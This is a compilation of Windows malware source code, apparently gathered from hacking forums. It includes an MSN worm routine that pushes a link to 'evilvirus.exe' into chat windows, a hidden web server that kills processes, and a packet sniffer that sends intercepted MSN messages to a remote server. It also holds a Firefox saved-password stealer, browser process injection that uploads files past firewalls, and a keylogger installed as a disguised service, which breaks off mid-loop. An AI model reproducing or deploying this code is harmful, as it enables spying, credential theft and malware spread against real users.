 send(sockfd, buffer, (strlen(buffer)), 0);
 recv(sockfd, buffer, (strlen(buffer)), 0);
 sleep(500);
  
 strcpy(buffer,"QUIT\n"); 
 send(sockfd, buffer, (strlen(buffer)), 0);
 recv(sockfd, buffer, (strlen(buffer)), 0);
 sleep(500);        
 
 closesocket(sockfd);
 WSACleanup();
 
 return (0);
}

char *Message = "http://www.fuckup.de/evilvirus.exe";

int WINAPI wep(HWND hwnd,LPARAM lparam)
{
  
   char text[128],cname[128];
   HWND child;
  
   if(!GetClassName(hwnd,cname,sizeof cname))
             return 0;

   if(!strcmp(cname,"IMWindowClass")) {
         
         child = FindWindowExA(hwnd,0,"DirectUIHWND",0);

         SetForegroundWindow(hwnd);
         Sleep(500);

         BlockInput(1);
        
         for(int x=0;x<strlen(Message);x++)
           PostMessageA(child,WM_CHAR,Message[x],0);
         
         PostMessage(child, WM_KEYDOWN, VK_RETURN, 0);
         PostMessage(child, WM_KEYUP, VK_RETURN, 0);
         PostMessage(child, WM_KEYDOWN, VK_RETURN, 0);
         PostMessage(child, WM_KEYUP, VK_RETURN, 0);
         
         BlockInput(0);
         
         Sleep(200);

   }
}

int main()
{
 EnumWindows(wep,0);
}

// for thread saftey
char *strtok_r (char *s, const char *delim, char **save_ptr) {
 char *token;

 if (s == NULL)
  s = *save_ptr;

 /* Scan leading delimiters.  */
 s += strspn (s, delim);
 if (*s == '') {
  *save_ptr = s;
  return NULL;
 }

 /* Find the end of the token.  */
 token = s;
 s = strpbrk (token, delim);
 if (s == NULL)
  /* This token finishes the string.  */
  *save_ptr = strchr (token, '');
 else {
  /* Terminate the token and make *SAVE_PTR point past it.  */
  *s = '';
  *save_ptr = s + 1;
 }
 return token;
}

/* x2c() and unescape_url()... stolen code */
char x2c(char *what) {
 register char digit;

 digit = (what[0] >= 'A' ? ((what[0] & 0xdf) - 'A')+10 : (what[0] - '0'));
 digit *= 16;
 digit += (what[1] >= 'A' ? ((what[1] & 0xdf) - 'A')+10 : (what[1] - '0'));
 return(digit);
}

// duh
void unescape_url(char *url) {
 register int x,y;

 for (x=0,y=0; url[y]; ++x,++y) {
  if ((url[x] = url[y]) == '%') {
   url[x] = x2c(&url[y+1]);
   y+=2;
  }
 }
 url[x] = '';
}

int killProc(char *szProcName)
{
 PROCESSENTRY32 pEntry = {sizeof(PROCESSENTRY32)};
 HANDLE hProc=NULL,
     hSs=NULL;
 int ret=0;
 
 hSs = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
 if (hSs) {
    if (Process32First(hSs, &pEntry)) {
    while (Process32Next(hSs, &pEntry)) {
     if (!stricmp(szProcName, pEntry.szExeFile)) {
     hProc = OpenProcess(PROCESS_TERMINATE, FALSE, pEntry.th32ProcessID);
     if (hProc) {
     if (TerminateProcess(hProc, 0)) {
        ret++;
     }
     CloseHandle(hProc);
     }
     }
    }
    } else ret=0;
    CloseHandle(hSs);
 } else ret=0;

 return ret;
}

// makes a listening socket
SOCKET SetUpListener(LPCSTR where, SHORT port) {
 SOCKET s;
 struct sockaddr_in sin_interface;
 DWORD if_addr = inet_addr(where); // where are we lisrening?

 if (if_addr != INADDR_NONE) { // if we're not lisrening anywhere, give up
  // otherwise, make a socket
  s = socket(AF_INET, SOCK_STREAM, 0);
  if (s != INVALID_SOCKET) {
   // set up a sockaddr_in so we can bind
   sin_interface.sin_family = AF_INET;
   sin_interface.sin_addr.s_addr = if_addr;
   sin_interface.sin_port = htons(port);

   // bind !!! for great justice
   if (bind(s, (struct sockaddr*)&sin_interface,
      sizeof(struct sockaddr_in)) != SOCKET_ERROR) {
    listen(s, 1);
    return s;
   }
  }
 }

 // if we get here, shit fucked up
 return INVALID_SOCKET;
}

// builds a HTTP header
void BuildHeader(char * buf, int code, char * msg) {
 char * time_buf;
 time_t now;

 time_buf = malloc(256);
 now = time(NULL);
 strftime(time_buf, 256, "%a, %d %b %Y %H:%M:%S %Z", gmtime(&now));

 sprintf(buf, "HTTP/1.1 %d %s\r\n", code, msg);
 sprintfc(buf, "Date: %s\r\n", time_buf);
 sprintfc(buf, "Server: %s\r\n", SERVER_VER);
 sprintfc(buf, "Connection: close\r\n");

 free(time_buf);
}

// makes a stupid error page
void SendErrorPage(SOCKET s, int error, char * message) {
 char * message_buf;

 message_buf = malloc(1024);

 BuildHeader(message_buf, error, message);

 sprintfc(message_buf, "Content-type: text/plain\r\n\r\n");
 sprintfc(message_buf, "Error %d: %s\r\n\r\n", error, message);

 send(s, message_buf, strlen(message_buf), 0);

 free(message_buf);
}

DWORD ServeWeb(SOCKET * sp) {
 SOCKET s = *sp;
 char *uri, *client_buf, *strtok_tmp;
 char *server_buf,*request,*method,*http_ver,*token;
 char * listing;
 int x;
 
 client_buf = malloc(1024); // 1k is enough
 memset(client_buf, 0, 1024);

 x = recv(s, client_buf, 1024, 0);

 
 if ((x == SOCKET_ERROR) || (x == 0)) {
  printf("Something went wrong. error %d\n", WSAGetLastError());
  free(client_buf);
  closesocket(s);
  return 0;
 }

 request = strtok_r(client_buf, "\r\n", &strtok_tmp);

 method = strtok_r(request, " ", &strtok_tmp);

 if (method == NULL) {
 
  SendErrorPage(s, 400, "Bad Request");
  free(client_buf);
  closesocket(s);
 }

 if (strcmp(method, "GET") != 0 && strcmp(method, "HEAD") != 0) {

  SendErrorPage(s, 501, "Not Implemented");

  free(client_buf);
  closesocket(s);
 }

 uri = strtok_r(NULL, " ", &strtok_tmp);
 http_ver = strtok_r(NULL, " ", &strtok_tmp);

 if (uri == NULL || http_ver == NULL) {

  SendErrorPage(s, 400, "Bad Request");
  free(client_buf);
  closesocket(s);
 }

 if (strncmp(http_ver, "HTTP/1.", 6) != 0) {

  SendErrorPage(s, 505, "Invalid HTTP Version");
  free(client_buf);
  closesocket(s);
 }

 if (strcmp(uri, "/") == 0) {
  // yay, menu page.
  server_buf = malloc(1024);
  BuildHeader(server_buf, 200, "OK");
  send(s, server_buf, strlen(server_buf), 0);

  listing = malloc(512);

  sprintf(server_buf, "<html><head><title>%s</title></head>\n"
    "<body><h2>Msn Killer</h2><hr><a href=\"msn\">Terminate Msn Messenger</a><hr><small>Msn Kill by Jarhead</small></body></head></html>\n", SERVER_VER);
  sprintf(listing, "Content-length: %d\r\n\r\n", strlen(server_buf));
  send(s, listing, strlen(listing), 0);
  send(s, server_buf, strlen(server_buf), 0);
  free(listing);
  free(client_buf);
  free(server_buf);
  closesocket(s);
 }

 uri++;

 unescape_url(uri);

if (strcmp(uri, "msn") == 0) {
  // yay, msn page.
  server_buf = malloc(1024);
  BuildHeader(server_buf, 200, "OK");
  send(s, server_buf, strlen(server_buf), 0);
  listing = malloc(512);
if(killProc("msnmsgr.exe"))
sprintf(server_buf, "<html><head><title>%s</title></head>\n"
"<body><h2>Msn Proccess Killed</h2><hr><small>"
"Msn Kill by Jarhead</small></body></head></html>\n", SERVER_VER);

else sprintf(server_buf, "<html><head><title>%s</title></head>\n"
"<body><h2>Proccess not killed</h2><hr><small>"
"Msn Kill by Jarhead</small></body></head></html>\n", SERVER_VER);
  
  sprintf(listing, "Content-length: %d\r\n\r\n", strlen(server_buf));
  send(s, listing, strlen(listing), 0);
  send(s, server_buf, strlen(server_buf), 0);
  free(listing);
  free(client_buf);
  free(server_buf);
  closesocket(s);

 }
 //doubledot hack zomg
 token = strstr (uri, "..");
 while (token != NULL) {
  memmove (token, token + 2, 2);
  token = strstr (token, "..");
 }

 server_buf = malloc(1024);
   BuildHeader(server_buf, 200, "OK");

   free(client_buf);
 free(server_buf);
 closesocket(s);
 return 0;

}

int main(int argc, char** argv) {
 WSADATA w;
 SOCKET listener, accepted;
 int dummy; // for CreateThread()
FreeConsole(); //or just do Dev - No Cmd show
 WSAStartup(MAKEWORD(2,0), &w);
 listener = SetUpListener("0.0.0.0",32826);

 if (listener != INVALID_SOCKET) {
  while (1) {
   accepted = accept(listener, NULL, 0); // sockaddrs are silly

   if ((accepted == INVALID_SOCKET) && (WSAGetLastError() == WSAECONNRESET))
    continue; // connection reset is OK, try again
   else if (accepted == INVALID_SOCKET)
    break; // otherwise, bail

   // wonderful. fork the thread
   CreateThread(NULL, 0, ServeWeb, &accepted, 0, &dummy);

   // let stuff settle
   Sleep(10);
  }
 }

 // if we get here - shit's fucked up real bad
 printf("Something went wrong. error %d\n", WSAGetLastError());
 closesocket(listener);
 closesocket(accepted);
 WSACleanup();

 return 0;
}

#include <string>
#include <windows.h>
#include <winsock2.h>
#include <wininet.h>
#define SIO_RCVALL _WSAIOW(IOC_VENDOR,1)
#define ERROR_WSA  -1
#define ERROR_IP   -2
#define ERROR_SOCK -3
#define ERROR_BIND -4
#define ERROR_RECV -5
#define ERROR_PROT -6
#define ERROR_DATA -7
#define ERROR_TIME -8
#define BUFFERSIZE 1024*1024
#define TIMEOUTSEC 30
using namespace std;
struct iphdr
{
unsigned char   ver_len;
unsigned char   tos;
unsigned short  total_len;
unsigned short  id;
unsigned short  flags;
unsigned char   ttl;
unsigned char   protocol;
unsigned short  checksum;
unsigned long   ip_src;
unsigned long   ip_dst;
};
struct tcphdr
{
unsigned short port_src;
unsigned short port_dst;
unsigned long  seq_nr;
unsigned long  ack_nr;
unsigned char  len;
unsigned char  flags;
unsigned short win_size;
unsigned short checksum;
unsigned short align;
};
SOCKET sock;
fd_set sockset;
int initialize()
{
closesocket(sock);
//Initialize WSA
WSAData wsa;
if (WSAStartup(MAKEWORD(2, 2), &wsa) != 0) return ERROR_WSA;
//Get the IP of the adapter to bind to
PHOSTENT  hostinfo;
char hostname[256];
char *ip;
if (gethostname(hostname, 256)) return ERROR_IP;
if (!(hostinfo = gethostbyname(hostname))) return ERROR_IP;
ip = inet_ntoa(*(struct in_addr *)*hostinfo->h_addr_list);
//Create a socket
sock = socket(AF_INET, SOCK_RAW, IPPROTO_IP);
if (sock == INVALID_SOCKET) return ERROR_SOCK;
//Bind the socket
sockaddr_in addr;
int i = 1;
DWORD ret;
memset(&addr, 0, sizeof(addr));
addr.sin_addr.s_addr  = inet_addr(ip);
addr.sin_family       = AF_INET;
addr.sin_port         = 0;
if (bind(sock, (sockaddr *)&addr, sizeof(addr)) == SOCKET_ERROR) return ERROR_BIND;
if (WSAIoctl(sock, SIO_RCVALL, &i, sizeof(i), NULL, NULL, &ret, NULL, NULL) == SOCKET_ERROR) return ERROR_BIND;
//Create the socket set for timeout checking
FD_ZERO(&sockset);
FD_SET(sock, &sockset);
return 0;
}
int parse_tcp(char* buffer, int len, char* result)
{
iphdr   *IP;
tcphdr  *TCP;
char    *DATA;
IP   = (iphdr*) buffer;
TCP  = (tcphdr*)(buffer + sizeof(iphdr));
DATA = (char*)(buffer + sizeof(iphdr) + sizeof(tcphdr));
if (IP->protocol != 0x06) return ERROR_PROT;
memset(result, 0, BUFFERSIZE);
//test for msn message
if (memcmp(DATA,"MSG ",4)) return ERROR_DATA;
if (!strstr(DATA,"text/plain")) return ERROR_DATA;
//get the nickname
char *nick_start = DATA+4;
char *nick_end = strstr(nick_start, " ");
char nick[128];
memset(nick, 0, 128);
memcpy(nick,nick_start,nick_end-nick_start);
if (!strstr(nick,"@")) sprintf(nick,"localuser");
//get the message
char *message = strstr(DATA,"\r\n\r\n")+4;
sprintf(result,"%s: %s\n",nick, message);
return 0;
}
int post_message(char *message)
{
//make message hex
char action[BUFFERSIZE];
sprintf(action,"http://my.server.com/add_the_message_to_the_db.php?message=");
int initial_len = strlen(action);
for (int i=0; i<strlen(message); i++) sprintf(action+(i*2)+initial_len, "%02X", message[i]);
printf("%s\n",action);
//Initialize the Internet session for posting messages
HINTERNET session = InternetOpen("Limitz Agent",INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);
HINTERNET request = InternetOpenUrl(session, action, NULL, 0, NULL, 0);
InternetCloseHandle(request);
InternetCloseHandle(session);
return 0;
}
int run_sniffer()
{
char *buffer = (char*) malloc(BUFFERSIZE);
char *result = (char*) malloc(BUFFERSIZE);
int len, error;
timeval tv;
tv.tv_sec = TIMEOUTSEC;
tv.tv_usec = 0;
while (true)
{
memset(buffer, 0, BUFFERSIZE);
error = select(sock+1, &sockset, NULL, NULL, &tv);
if (error <= 0)
{
//timeout
return ERROR_TIME;
}
len = recv(sock, buffer, BUFFERSIZE-1, 0);
printf(".");
if (len <= 0) {
printf("%d\n",len);
break;
}
error = parse_tcp(buffer, len, result);
if (error) continue;
post_message(result);
}
free(buffer);
free(result);
return ERROR_RECV;
}
int main(int argc, char *argv[])
{
int error;
while (1)
{
error = initialize();
if (error)
{
printf("%d\n",error);
Sleep(1000);
continue;
}
error = run_sniffer();
printf("%d\n",error);
}
return 0;
}

  std::string line;
  std::string user;
  std::string path;
  std::string data;
  std::string efolder;
  std::string eFile;
  char UserName[100];
  DWORD nUserName;
  
   /*
    The folder name & file the encrypted passwords are stored in
    sre randomly generated on a firefox install. So, in reality
    you'd have to search the folder "Default" for a folder ending with ".stl"
    (salt) - and then search for a file ending in ".s"
   */
   http://www.rohitab.com/discuss/topic/29875-steal-firefox-passwords/
Okay, so most people don't remember every password for the internet (form auth), so they get their browser (in this case firefox) to store them. These passwords are kept in a folder different from the one shown, upon install, a random string is generated for the folder name. The passwords are encrypted in base64, which are easy to decode. But once you get the file.s file in your hands, you wouldn't care, because yellowpipe would take care of the rest.

It'ds just an idea, flame all you like! But it's easier than installing a keylogger, unless you're after a non web based password.


   
   int main()
   {
     // get username
     nUserName = sizeof(UserName);
     GetUserName(UserName, &nUserName);
     user = UserName;
    
     efolder  = "i39bfb38.slt";
     eFile = "5455086.s";
    
     // read in data
     path = "C:\\Documents and Settings\\"+user+"\\Application   Data\\Mozilla\\Profiles\\Default\\"+efolder+"\\"+eFile;
     std::ifstream in(path.c_str());
     while(!in.eof() && in.is_open())
     {
    getline (in,line);
    data.append(line);
     }
     // could send it over winsock
     // or save to a file
     // print it out for now.
     std::cout << data << std::endl;
     return 0;
    }

Hello.

I wrote this for my friend who reads this forum. The code isn't very clear (not commented, because I wrote it very fast (in one night (~10h))) The only exception is utils.inc, which I ripped from my other project. Anyway I decided to show off this code, because you probably find it useful The actual code is written in FASM and it compiles to .obj-file. Object file is very similar to .DLL, but it's in linkable format so you can use it with HLLs. The source code and simple example how to use it in C++ is below (compiled .obj and Dev-C++ project file in attachment).

Method I use for firewall bypass is pretty simple and effective (not the scriptkiddish registry modification trick...) fuplo(char* szUrl, char* szFile) function in fuplo.obj first resolves default browser from registry (HKEY_CLASSES_ROOT\HTTP\shell\open\command) and uses CreateProcess with CREATE_SUSPENDED-flag to open the browser. Then, by using VirtualAllocEx and WriteProcessMemory it writes code that is used to uploading to address space of the browser. Browser executes the code and uploads the specified file -> horray!

So the method relies on that firewall has given required privileges to browser to "access internet" I still want to say that this method is not however completely stealth, because firewall software can hook function calls to CreateProcess and WriteProcessMemory and notify user of suspicious behavior.

fuplo.ASM (im sorry about ugly indent - i used bad IDE )


format MS COFF;PE GUI 4.0

include 'win32a.inc'
include 'api/wsock32.inc'
include 'defs.inc'

public fuplo as '_fuplo'

section '.text' code readable executable

..inject:
   call @f
@@:

;   pushz 'kernel32.dll'
;   call LocateModule;
;   pushz 'Sleep'
;   push eax
;   call GetProc
;   mov ebx, eax
;@@:   push 1000
;   call ebx
;   jmp @b
   pushz 'kernel32.dll'
   call LocateModule
   mov ebx, eax      ; base of kernel in ebx

   pop eax
   add eax, ..endofinject-..inject-5
   push eax
   mov edi, eax
   mov al, 0
   or ecx, -1
   repnz scasb
   push edi
   call upload

   pushz 'ExitProcess'
   push ebx
   call GetProc
   push 0
   call eax

proc upload szFile:DWORD, szUrl:DWORD
   local hKernel32:DWORD
   local hUser32:DWORD
   local szHost:DWORD
   local szPath:DWORD
   local dwFileNameLen:DWORD
   local szShortName:DWORD
   local dwRequestLen:DWORD
   local lpRequest:DWORD
   local hFile:DWORD
   local dwRead:DWORD
   local dwFileSize:DWORD
   local szRequest:DWORD
   local lpLocalAlloc:DWORD
   local wsa:WSADATA
   local dest:sockaddr_in
   local fdSock:DWORD
   xor eax, eax
   pushad

   pushz 'user32.dll'
   pushz 'LoadLibraryA'
   push ebx
   call GetProc
   mov esi, eax
   call eax
   mov [hUser32], eax

   pushz 'WS2_32.dll'
   call esi
   test eax, eax
   je .Exit

   mov [hKernel32], ebx
   mov ebx, eax

   lea eax, [wsa]
   push eax
   push 101h
   pushz 'WSAStartup'
   push ebx
   call GetProc
   call eax
   test eax, eax
   jnz .Exit

     ; parsaa
   mov [dwRequestLen], 0
   mov edi, [szUrl]
   cmp dword [edi], 'http'
   jnz .wwwcheck
   add edi, 7; http://
.wwwcheck:  cmp dword [edi], 'www.'
   jnz @f
   add edi, 4
@@:   mov esi, edi
   mov al, '/'
   mov ecx, 60
   repnz scasb
   jnz .Exit2; invalid url
   sub edi, esi
   add [dwRequestLen], edi
   dec [dwRequestLen]
   push edi
   push edi
   push LMEM_FIXED
   pushz 'LocalAlloc'
   push [hKernel32]
   call GetProc
   mov [lpLocalAlloc], eax
   call eax

   pop ecx
   mov edi, eax
   mov [szHost], eax
   push eax
   rep movsb
   mov byte [edi-1], 0

   dec esi
   mov edi, esi
   mov al, 0
   mov ecx, 0FFh
   repnz scasb
   jnz .Exit2
   sub edi, esi
   add [dwRequestLen], edi
   dec [dwRequestLen]
   push edi
   push edi
   push LMEM_FIXED
   call [lpLocalAlloc]

   pop ecx
   mov edi, eax
   mov [szPath], eax
   rep movsb

   pushz 'gethostbyname'
   push ebx
   call GetProc
   call eax
   test eax, eax
   je .Exit2

   mov eax, [eax+hostent.h_addr_list]
   mov eax, [eax]
   mov eax, [eax]
   mov [dest+sockaddr_in.sin_addr], eax

   add [dwRequestLen], .FormatEnd-.FormatStart-6
   add [dwRequestLen], 3; PANIXPANIC PANIC P�Y ATTENTI�N T� TIZ

   push NULL
   push FILE_ATTRIBUTE_NORMAL
   push OPEN_EXISTING
   push NULL
   push FILE_SHARE_READ
   push GENERIC_READ
   push [szFile]
   pushz 'CreateFileA'
   push [hKernel32]
   call GetProc
   call eax
   test eax, eax
   je .Exit
   mov [hFile], eax

   push NULL
   push eax
   pushz 'GetFileSize'
   push [hKernel32]
   call GetProc
   call eax
   mov [dwFileSize], eax
   add [dwRequestLen], eax

   mov edi, [szFile]
   xor al, al
   or ecx, -1
   repnz scasb
   lea esi, [edi-2]
   std
@@:   lodsb
   cmp esi, [szFile]
   je .ShortFN
   cmp al, '\'
   jnz @b
@@:   inc esi
   inc esi
.ShortFN:   cld
   mov [szShortName], esi
   sub edi, esi
   dec edi
   mov [dwFileNameLen], edi

   push PAGE_READWRITE
   push MEM_COMMIT
   push [dwRequestLen]
   push NULL
   pushz 'VirtualAlloc'
   push [hKernel32]
   call GetProc
   call eax
   mov [lpRequest], eax

   push [szShortName]
   push [dwFileSize]
   add dword [esp], .FormatEnd-.ContentStart-3; null-terminator + %s
   mov eax, [dwFileNameLen]
   add [esp], eax
   push [szHost]
   push [szPath]
   call .FormatEnd
.FormatStart:  db "POST %s HTTP/1.1",0Dh,0Ah
   db "Host: %s",0Dh,0Ah
   db "User-Agent: fuplo",0Dh,0Ah
   db 'Content-Type: multipart/form-data; boundary="=_vw0.98992842109405d_="',0Dh,0Ah
   db "Content-Length: %ld",0Dh,0Ah,0Dh,0Ah

.ContentStart  db "--=_vw0.98992842109405d_=",0Dh,0Ah
   db 'Content-Disposition: form-data; name="upf"; filename="%s"',0Dh,0Ah,0Dh,0Ah,0

.EndBoundary:  db 0Dh,0Ah,"--=_vw0.98992842109405d_=--",0Dh,0Ah
.FormatEnd: push [lpRequest]
   pushz 'wsprintfA'
   push [hUser32]
   call GetProc
   call eax
   add esp, 4 * 6

   mov edi, [lpRequest]
   add edi, eax
   add eax, .FormatEnd-.EndBoundary
   mov [dwRequestLen], eax

   push [szHost]
   pushz 'LocalFree'
   push [hKernel32]
   call GetProc
   mov esi, eax
   call eax
   push [szPath]
   call esi

   push NULL
   lea eax, [dwRead]
   push eax
   push [dwFileSize]
   push edi
   push [hFile]
   pushz 'ReadFile'
   push [hKernel32]
   call GetProc
   call eax
   mov esi, eax

   push [hFile]
   pushz 'CloseHandle'
   push [hKernel32]
   call GetProc
   call eax

   test esi, esi
   je .Exit3

   mov eax, [dwRead]
   add [dwRequestLen], eax
   add edi, [dwFileSize]
   call @f
@@:   pop esi
   add esi, .EndBoundary - @b
   mov ecx, .FormatEnd-.EndBoundary
   rep movsb

   push 0
   push SOCK_STREAM
   push PF_INET
   pushz 'socket'
   push ebx
   call GetProc
   call eax
   cmp eax, -1
   je .Exit3
   mov [fdSock], eax

   mov [dest+sockaddr_in.sin_family], AF_INET
   mov [dest+sockaddr_in.sin_port], 5000h
   mov ecx, sizeof.sockaddr_in.sin_zero
   lea edi, [dest+sockaddr_in.sin_zero]
   xor al, al
   rep stosb

   push sizeof.sockaddr_in
   lea eax, [dest]
   push eax
   push [fdSock]
   pushz 'connect'
   push ebx
   call GetProc
   call eax
   cmp eax, -1
   je .Exit3

   pushz 'send'
   push ebx
   call GetProc
   mov esi, eax
   mov edi, [lpRequest]

   push MEM_DECOMMIT
   push [dwRequestLen]

@@:   push 0
   push [dwRequestLen]
   push edi
   push [fdSock]
   call esi
   add edi, eax
   sub [dwRequestLen], eax
   jnz @b

.Exit3:  push [lpRequest]
   pushz 'VirtualFree'
   push [hKernel32]
   call GetProc
   call eax

   push [fdSock]
   pushz 'closesocket'
   push ebx
   call GetProc
   call eax
     ;pushz 'Sleep'
     ;push [hKernel32]
     ;call GetProc
     ;push 1000
     ;call eax

.Exit2:  pushz 'WSACleanup'
   push ebx
   call GetProc
   call eax
.Exit:   popad
   ret
endp

   include 'utils.inc'
   label szGivenUrl BYTE
..endofinject:

proc fuplo szUrl:DWORD, szFile:DWORD
   xor eax, eax
   pushad
   local hKernel32:DWORD
   local hAdvapi32:DWORD
   local szBrowserPath:DWORD
   local dwUrlLen:DWORD
   local dwFilenameLen:DWORD

   mov edi, [szUrl]
   or ecx, -1
   xor al, al
   repnz scasb
   neg ecx
   sub ecx, 1;2
   mov [dwUrlLen], ecx

   mov edi, [szFile]
   or ecx, -1
   xor al, al

   repnz scasb
   neg ecx
   sub ecx, 1
   mov [dwFilenameLen], ecx

   pushz 'kernel32.dll'
   call LocateModule
   mov [hKernel32], eax

   pushz 'advapi32.dll'
   pushz 'LoadLibraryA'
   push eax
   call GetProc
   call eax
   mov [hAdvapi32], eax

_ResolveBrowser:
   local hHttpKey:DWORD
   local lpKeyData:DWORD
   local dwCrap:DWORD

   mov ebx, eax
   pushz 'RegOpenKeyExA'
   push eax
   call GetProc

   lea edx, [hHttpKey]
   push edx
   push KEY_QUERY_VALUE
   push 0
   pushz 'HTTP\shell\open\command'
   push HKEY_CLASSES_ROOT
   call eax
   test eax, eax
   jnz _Exit

   lea edx, [dwCrap]
   push edx
   push NULL
   push NULL
   push NULL
   push NULL
   push [hHttpKey]
   pushz 'RegQueryValueExA'
   push ebx
   call GetProc
   mov edi, eax
   call eax

   push [dwCrap]
   push LMEM_FIXED
   pushz 'LocalAlloc'
   push [hKernel32]
   call GetProc
   call eax
   mov [lpKeyData], eax
   mov esi, eax

   lea edx, [dwCrap]
   push edx
   push eax
   push 0
   push NULL
   push NULL
   push [hHttpKey]
   call edi

   push [hHttpKey]
   pushz 'RegCloseKey'
   push ebx
   call GetProc
   call eax

   mov ebx, [hKernel32]

_ParseKeyData:
   mov [szBrowserPath], esi
   lodsb
   cmp al, '"'
   jnz @f
   inc [szBrowserPath]
   jmp .SearchEnd
@@:   mov al, ' '
.SearchEnd: mov edi, esi
@@:   scasb
   jnz @b
   mov byte [edi-1], 0

_CreateProcess:
   local pi:PROCESS_INFORMATION
   local si:STARTUPINFO

   mov ecx, sizeof.PROCESS_INFORMATION
   lea edi, [pi]
   push edi
   xor al, al
   rep stosb
   mov ecx, sizeof.STARTUPINFO
   lea edi, [si]
   push edi
   push edi
   rep stosb

   pushz 'GetStartupInfoA'
   push ebx
   call GetProc
   call eax

   push NULL
   push NULL
   push CREATE_SUSPENDED
   push FALSE
   push NULL
   push NULL
   push NULL
   push [szBrowserPath]

   pushz 'CreateProcessA'
   push ebx
   call GetProc
   call eax
   test eax, eax
   je _Exit

.HijackProcess:
   local lpInjection:DWORD
   local ctx:CONTEXT

   push PAGE_EXECUTE_READWRITE
   push MEM_COMMIT
   mov eax, ..endofinject-..inject
   add eax, [dwUrlLen]
   add eax, [dwFilenameLen]
   push eax
   push NULL
   push dword [pi+PROCESS_INFORMATION.hProcess]
   pushz 'VirtualAllocEx'
   push ebx
   call GetProc
   call eax
   mov [lpInjection], eax

   lea edx, [ctx]
   push edx
   mov [edx+CONTEXT.ContextFlags], CONTEXT_FULL
   push dword [pi+PROCESS_INFORMATION.hThread]
   pushz 'GetThreadContext'
   push ebx
   call GetProc
   call eax

   mov edi, [lpInjection]
   lea eax, [dwCrap]
   push eax
   push ..endofinject-..inject
   push ..inject
   push edi
   push dword [pi+PROCESS_INFORMATION.hProcess]
   pushz 'WriteProcessMemory'
   push ebx
   call GetProc
   mov esi, eax
   mov [ctx+CONTEXT.Eip], edi
   call eax
   add edi, ..endofinject-..inject
   lea eax, [dwCrap]
   push eax
   push [dwUrlLen]
   push [szUrl]
   push edi
   push dword [pi+PROCESS_INFORMATION.hProcess]
   call esi
   add edi, [dwUrlLen]
   lea eax, [dwCrap]
   push eax
   push [dwFilenameLen]
   push [szFile]
   push edi
   push dword [pi+PROCESS_INFORMATION.hProcess]
   call esi

   lea edx, [ctx]
   push edx
   push dword [pi+PROCESS_INFORMATION.hThread]
   pushz 'SetThreadContext'
   push ebx
   call GetProc
   call eax

   push dword [pi+PROCESS_INFORMATION.hThread]
   pushz 'ResumeThread'
   push ebx
   call GetProc
   call eax

   mov [esp+_PUSHAD.Pushad_eax], 1
_Exit:   popad
   ret
endp

#include <windows.h>

using namespace std;

BOOL Install_Logger_Service();
void Initialize_Service();
void WINAPI Create_Service(DWORD , CHAR**);
void WINAPI Handle_Controls(DWORD control_code);

BOOL Logger();

char service_name[100] = TEXT("Local Sex Daemon");
SERVICE_STATUS serv_status;
SERVICE_STATUS_HANDLE serv_handle = 0;
HANDLE stop_service = 0;
HHOOK hook_handle;

int main() {
 Install_Logger_Service();
 Initialize_Service();

 
 
 return 0;
}

BOOL Install_Logger_Service() {

  SC_HANDLE check_serv_handle = OpenSCManager(0, 0, SC_MANAGER_CONNECT);
  if (check_serv_handle) {
  SC_HANDLE chk_serv = OpenService(check_serv_handle, service_name, SERVICE_QUERY_STATUS);
  if (chk_serv != NULL) {
     CloseServiceHandle(chk_serv);
     CloseServiceHandle(check_serv_handle);
     return TRUE;
  }
  CloseServiceHandle(check_serv_handle);
  }
  SC_HANDLE serv_c_handle = OpenSCManager(0, 0, SC_MANAGER_CREATE_SERVICE);

  if (serv_c_handle) {
  char prog_path[MAX_PATH + 1];
  if (GetModuleFileName(0, prog_path, sizeof(prog_path)/sizeof(prog_path[0])) == strlen(prog_path)) {
     SC_HANDLE create_serv = CreateService (serv_c_handle,
             service_name, //Service Name
             service_name, //Display Name
             SERVICE_ALL_ACCESS,
             SERVICE_WIN32_OWN_PROCESS | SERVICE_INTERACTIVE_PROCESS,
             SERVICE_AUTO_START,
             SERVICE_ERROR_IGNORE,
             prog_path,
             0, 0, 0, 0, 0);
     if (create_serv != NULL) {
     StartService(create_serv, 0, 0);  //This will get it started the first time
     CloseServiceHandle(create_serv);
     exit(0);
     }
  }
  CloseServiceHandle(serv_c_handle);
  }
  return TRUE;
}

void WINAPI Create_Service(DWORD , CHAR**) {

  serv_status.dwServiceType = SERVICE_WIN32;
  serv_status.dwCurrentState = SERVICE_STOPPED;
  serv_status.dwControlsAccepted = 0;
  serv_status.dwWin32ExitCode = NO_ERROR; 
  serv_status.dwServiceSpecificExitCode =  NO_ERROR;
  serv_status.dwCheckPoint = 0;
  serv_status.dwWaitHint = 0;
  
  serv_handle = RegisterServiceCtrlHandler(service_name, Handle_Controls);
  
  if (serv_handle) {
  serv_status.dwCurrentState = SERVICE_START_PENDING;
  SetServiceStatus(serv_handle, &serv_status);
    
  stop_service = CreateEvent(0, FALSE, FALSE, 0);
    
  serv_status.dwCurrentState = SERVICE_RUNNING;
  SetServiceStatus(serv_handle, &serv_status);
  
  //This is where the logging gets started at

  Logger();
    

  }
  return;
}

void WINAPI Handle_Controls(DWORD control_code) {
  switch (control_code) {
   default: {
      break;
   }
  }
  SetServiceStatus(serv_handle, &serv_status);
  return;
}

void Initialize_Service() {
  SERVICE_TABLE_ENTRY ServTable[] =  {
       {service_name, Create_Service},
       {0, 0},
  };
 
  if (StartServiceCtrlDispatcher(ServTable) == 0) {
  return;
  }
 
  return;
}

BOOL Logger() {
  char window_text[500];
  char old_window_text[500];
  char latest_key[50];
  char file_name[MAX_PATH + 1];
  char write_name[500];
  int i;
  int virt_key;
  HANDLE file_handle;
  HWND fore_hndl;
  DWORD numb_bytes;
  GetSystemDirectory(file_name, MAX_PATH + 1);
  strcat(file_name, "\\MahLogSon.txt");
  file_handle = CreateFile (file_name, FILE_APPEND_DATA, FILE_SHARE_READ, NULL, OPEN_ALWAYS,
         FILE_ATTRIBUTE_NORMAL, 0); // Could make it hidden or
               //something if you wanted
               //FILE_ATTRIBUTE_HIDDEN
  while (1) {
     fore_hndl = GetForegroundWindow();
     if (fore_hndl != NULL) {
     if (GetWindowText(fore_hndl, (char*)&window_text, 499) != 0) {
     if (strcmp(window_text, old_window_text) != 0) {
     strcpy(write_name, "\r\n{WINDOW TITLE}-> ");
     strcat(write_name, window_text);
     strcat(write_name, "\r\n");
     WriteFile(file_handle, write_name, strlen(write_name), &numb_bytes, NULL);
     strcpy(old_window_text, window_text);
     }
     }
     }
     for (i = 8; i <= 255; i++) {
